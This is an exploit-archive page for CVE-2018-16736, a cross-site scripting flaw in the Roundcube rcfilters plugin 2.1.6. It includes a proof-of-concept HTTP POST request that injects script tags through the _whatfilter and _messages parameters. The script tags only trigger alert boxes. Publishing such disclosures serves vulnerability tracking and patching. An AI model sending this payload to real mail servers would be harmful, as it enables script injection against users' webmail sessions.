Roundcube rcfilters 2.1.6 Cross Site Scripting

Roundcube rcfilters 2.1.6 Cross Site Scripting: Posted Sep 19, 2018; Authored by Fahimeh Rezaei; Roundcube rcfilters plugin version 2.1.6 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2018-16736; SHA-256 | 5d5e55b142ababa9f48c19ae8d819c5b167be38bc7ff55ac40fbe2ffbf7662a4; Download | Favorite | View

Roundcube rcfilters 2.1.6 Cross Site Scripting

# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736
# https://nvd.nist.gov/vuln/detail/CVE-2018-16736
# https://github.com/eagle00789/RC_Filters/issues/19
 
# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the 
# _whatfilter and _messages parameters (in the Filters section of the settings).
 
# PoC
 
POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1
 
_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]<script>alert('XSS-1')</script>&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])<script>alert('XSS-2')</script>

Top Authors In Last 30 Days

Red Hat 237 files
Ubuntu 88 files
indoushka 67 files
Jasper Nota 25 files
Willem Westerhof 19 files
Gentoo 18 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,093)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,547)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,665)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,730)
UNIX (9,433)
UnixWare (187)
Windows (6,671)
Other

Roundcube rcfilters 2.1.6 Cross Site Scripting

Roundcube rcfilters 2.1.6 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Roundcube rcfilters 2.1.6 Cross Site Scripting

Share This

Roundcube rcfilters 2.1.6 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems